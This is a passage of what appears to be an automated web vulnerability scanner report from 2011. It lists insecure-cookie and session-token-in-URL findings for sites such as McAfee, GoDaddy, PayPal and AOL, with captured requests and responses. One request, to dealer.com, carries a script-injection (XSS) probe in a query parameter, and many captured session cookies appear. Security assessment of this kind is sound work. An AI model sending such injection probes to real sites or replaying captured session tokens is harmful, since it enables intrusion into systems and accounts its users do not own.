Cookie: SessionInfo=AffiliateId=0; isvt_visitor=yNo98QoBC2cAABJDQT4AAAAAAB1JCVeen0VKRW; WT_FPC=id=20dc5aca13b81baa15d1303034109486:lv=1303034109486:ss=1303034109486; SiteID=1; SessionInfo=AffiliateId=0; HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; Currency=56; HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fdownloads%2ffree-virus-scan&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; s_cc=true; s_vi=[CS]v1|26D5719A051D00E9-600001368029DFAB[CE]; IS3_History=1302573891-1-74_3--1__3_; IS3_GSV=DPL-2_TES-1303044907_PCT-1303044907_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; s_nr=1303045175869-New; s_ev8=%5B%5B%27mcafee%27%2C%271303045175870%27%5D%5D; s_sq=mcafeecomglobal%3D%2526pid%253Dconsumer%25253Aen-us%25253Adirect-0-mcafee%25253Afree_services%25253Afreescan_scan_initiated%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253Alocation.href%25253D%252522http%25253A//promos.mcafee.com/offer.aspx%25253Fid%25253D285986%252522%25253Bretu%2526oidt%253D2%2526ot%253DSUBMIT; foresee.alive=1303045176255; currentURL=blank; FSRCookie=isAlive=0||ForeseeLoyalty=1||previousURL=http%253A//home.mcafee.com/downloads/free-virus-scan; Locale=en%2Dus; lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; AffID=0; langid=1; lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26langid%3D1; session%5Fdata=%3CSessionData%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E0%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E0%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%3C%2FSessionData%3E%0D%0A

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 17-Apr-2041 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/cart/?offerId=285986&PkgQty=1; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:41 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d285986%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=720ea228faf811942ab0037780d0be935c4a4c55590b0216&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV10
X-UA-Compatible: IE=8
Date: Sun, 17 Apr 2011 12:59:41 GMT
Content-Length: 46143


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

8.7. https://home3.ca.com/Login2.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://home3.ca.com
Path:   /Login2.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login2.aspx?ReturnUrl=%2fMembers%2fDefault.aspx%3flang%3den-US&lang=en-US HTTP/1.1
Host: home3.ca.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; IS3_History=1301114230-2-91_0--2__0_0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 12:59:01 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Server-Name: CH1-BLW06
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rxpdf225tvaoaj45mhghiufz; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 14812


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="ctl00_siteHeader"><title>
   
Account Informati
...[SNIP]...

8.8. https://myaccount.bitdefender.com/site/MyAccount/login/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myaccount.bitdefender.com
Path:   /site/MyAccount/login/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/MyAccount/login/ HTTP/1.1
Host: myaccount.bitdefender.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _country=us; s_vi=[CS]v1|26D5718A851D098B-40000144C01B87EA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:52:34 GMT
Server: Apache
Set-Cookie: PHPSESSID=0jjt2ounle0kk4pc00ar32s852; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=3, max=150
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>MyAccount - Login</title>


<m
...[SNIP]...

8.9. https://secure.eset.com/us/store/geoIpRedirect

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.eset.com
Path:   /us/store/geoIpRedirect

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/store/geoIpRedirect HTTP/1.1
Host: secure.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:03:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=naf8til2k8arkr96bub4gpr1l1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 68
Connection: close
Content-Type: text/html; charset=UTF-8

var esetIpTracker = { "country": "US", "blocked": false, "url": "" }

8.10. https://secure.opinionlab.com/ccc01/comment_card.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDQQRASABB=GLICDNMAAPCGFBJAFDNMGBBP; path=/
Date: Sun, 17 Apr 2011 13:03:49 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

8.11. https://www.box.net/api/1.0/import

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.box.net
Path:   /api/1.0/import

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/1.0/import HTTP/1.1
Host: www.box.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 17 Apr 2011 14:21:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=8td87ko47k7q53dt7seepr17e2; path=/; domain=.box.net; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: box_visitor_id=4daaf75186f3b5.49804594; expires=Mon, 16-Apr-2012 14:21:05 GMT; path=/; domain=.box.net
Content-Length: 14151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Add this file to your Box</title>
   <meta http-equiv="X
...[SNIP]...

8.12. https://www.fathomseo.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.fathomseo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.fathomseo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:15:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30798
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSADQDTAD=FCKHKPGBANODOMJIEOGIMGKJ; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<
...[SNIP]...

8.13. https://www.godaddy.com/domains/popups/icannfee.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/popups/icannfee.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/popups/icannfee.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=yakdug55q042cwfev0d0at55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: SplitValue1=49; domain=godaddy.com; expires=Sun, 17-Apr-2011 13:53:59 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/popups/icannfee.aspx&server=M1PWCORPWEB126&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=49; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 15-Apr-2012 13:53:59 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 16 Apr 2011 13:53:58 GMT
Connection: close
Content-Length: 2105


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

8.14. https://www.trendsecure.com/my_account/signin/login

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.trendsecure.com
Path:   /my_account/signin/login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my_account/signin/login HTTP/1.1
Host: www.trendsecure.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store
Expires: Sun, 17 Apr 2011 13:11:58 GMT
Date: Sun, 17 Apr 2011 13:11:58 GMT
Content-Length: 7533
Connection: close
Set-Cookie: ci_session=6f36ad88e6821a419e616f0b0f033d3a; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!--Version=<<TS_VERSION>>-->
   <head>
       <title>My Account | Sign In</title>
       <meta http-equiv="c
...[SNIP]...

8.15. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www212.americanexpress.com
Path:   /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do HTTP/1.1
Host: www212.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:56:28 GMT
Server: IBM_HTTP_Server
Set-Cookie: dsmLive_JSESSIONID=00002ch3BvvUfnVaiFU5PB681_6:14qpqp8bv; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 33668


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>


<head>
<title>404 Error Page</title><META name="keywords" content="404 Error Page"><META name="description" content="404
...[SNIP]...

8.16. https://cc.dealer.com/views/forgot-password

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/forgot-password

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /views/forgot-password?reseller=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000145)%3C/script%3E&lang=en_US HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; ssoid=6124c450404638d30061b29f82e6d54d; JSESSIONID=giphhm46cleri

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:29:22 GMT
Connection: keep-alive
Set-Cookie: ssoid=636fcf5940463812016995a23d400c4d;path=/;domain=.dealer.com
Cache-Control: must-revalidate
Expires: Wed, 04 Dec 1996 21:29:02 GMT
Pragma: no-cache
Content-Length: 3977

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Forgot Username/Password</title>

<style type="text/css">
   body{
       margin:0;
       padding:0;
       over
...[SNIP]...

8.17. https://cc.dealer.com/views/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /views/login HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: cc.dealer.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:07:09 GMT
Connection: keep-alive
Set-Cookie: ssoid=60ff3811404638d500c85a33429f0cd7;path=/;domain=.dealer.com
Set-Cookie: BIGipServerSecureCC5Pool=805375498.20736.0000; path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 11311

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Login</title>

   <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="j
...[SNIP]...

8.18. https://www.godaddy.com/gdshop/registrar/search.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Sun, 10 Apr 2011 15:37:48 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 16-Apr-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 24-Apr-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDAUARSRCQ=GLPPJFHBBNEDMGCLDKGAFKGM; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 17 Apr 2011 14:17:48 GMT
Connection: close


8.19. https://www.mcafeesecure.com/RatingVerify

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mcafeesecure.com
Path:   /RatingVerify

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RatingVerify HTTP/1.1
Host: www.mcafeesecure.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: McAfeeSecure
Vary: Accept-Encoding
Location: http://www.mcafeesecure.com/
Content-Type: text/html; charset=utf-8
Content-Length: 66
Connection: close
Date: Sun, 17 Apr 2011 14:14:28 GMT
Set-Cookie: resin=1758093834.20480.0000; path=/

The URL has moved <a href="http://www.mcafeesecure.com/">here</a>

8.20. https://www.paypal.com/cgi-bin/webscr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /cgi-bin/webscr

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:20:35 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=UXEHhRignLFVTnbAVbYx_1vwRi191lhkMCn7gduBFxwbbN8SWoAw_nTx-rXGHvgzGLkhlCjuX0g5E7B7FR5Hh2rN6a0v30SnRjnQzcZN6TA5D9aG4xmP92NhvfgZ7MOQI90ruW%7cDdN43k21tDDpjjnO4e_BInxIbzYfiz5PV2_MEy-BabFIN_l0lObhx7xFRNfYq-UjIqZ060%7c3P1ypZI3mYev_wnz6YR7Iq-BvmVjBwnwZgZsyfqQV_yc8V3OHoZsBPqMBl_9lsS_pdXea0%7c1303046436; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=FWsPgNg73q2wIosHLLv5ZATwaiwWwju-w-P3qjeJQboWlPXYArkJ70RMIoWLTxeCI-QCp5cxVpV73b7L; expires=Sat, 12-Apr-2031 13:20:36 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cookie_check=yes; expires=Wed, 14-Apr-2021 13:20:36 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Wed, 14-Apr-2021 13:20:36 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Sat, 12-Apr-2031 13:20:36 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: Apache=10.191.114.147.1303046435466556; path=/; expires=Tue, 09-Apr-41 13:20:35 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31244

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#">
<head>
<meta http-equiv="C
...[SNIP]...

9. Session token in URL
There are 17 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.


9.1. http://aolproductcentral.aol.com/ClickBroker

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://aolproductcentral.aol.com
Path:   /ClickBroker

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /ClickBroker?campaign=03b17d66-f652-449e-80a4-a3be47274af9 HTTP/1.1
Host: aolproductcentral.aol.com
Proxy-Connection: keep-alive
Referer: http://daol.aol.com/security/computer-checkup
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.2b1bc27e5d9811e08af9616a40ee2636.cf55; VWCUKP300=L123100/Q68712_13124_135_040211_1_040311_424842x423979x040211x1x1; s_vi=[CS]v1|26CBEC11051D3387-6000010340009A75[CE]; s_pers=%20s_getnr%3D1303045102168-Repeat%7C1366117102168%3B%20s_nrgvo%3DRepeat%7C1366117102169%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcmp%252Caolsvc%253D%252526pid%25253Dcmp%2525253A%25252520Discover%25252520%2525257C%25252520Internet%25252520Security%25252520Central%2525253ACCU%252526pidt%25253D1%252526oid%25253Djavascript%2525253AohSnapcloud%25252528%25252527pc-tools-and-storage%25252527%2525252C%25252520%25252527aol-computer-checkup-1%25252527%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:58:23 GMT
Set-Cookie: JSESSIONID=BE5C9FA9E34FF10C39966BFE2460F3CE.storefrontus-m02a; Path=/
Set-Cookie: OFBiz.Visitor=1073744; Expires=Mon, 16-Apr-2012 12:58:23 GMT; Path=/
Content-Type: text/html;charset=UTF-8
ntCoent-Length: 33155
Content-Length: 33155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Begin Screen component://gps/widget/gpsScreens.xml#product -->
<!-- Beg
...[SNIP]...
<!-- PRICE END-->
                               <a id="purchaseURL" href="https://aolproductcentral.aol.com/control/additem;jsessionid=BE5C9FA9E34FF10C39966BFE2460F3CE.storefrontus-m02a?categoryId=pc-tools-and-storage&brandName=aol-computer-checkup" class="tryitforfree" title="TRY IT FREE">TRY IT FREE</a>
...[SNIP]...

9.2. https://aolproductcentral.aol.com/control/additem

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://aolproductcentral.aol.com
Path:   /control/additem

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /control/additem;jsessionid=ECB401B40469871F10689692AE99A374.storefrontus-m04a?categoryId=pc-tools-and-storage&brandName=aol-computer-checkup-1 HTTP/1.1
Host: aolproductcentral.aol.com
Connection: keep-alive
Referer: http://aolproductcentral.aol.com/ClickBroker?campaign=03b17d66-f652-449e-80a4-a3be47274af9
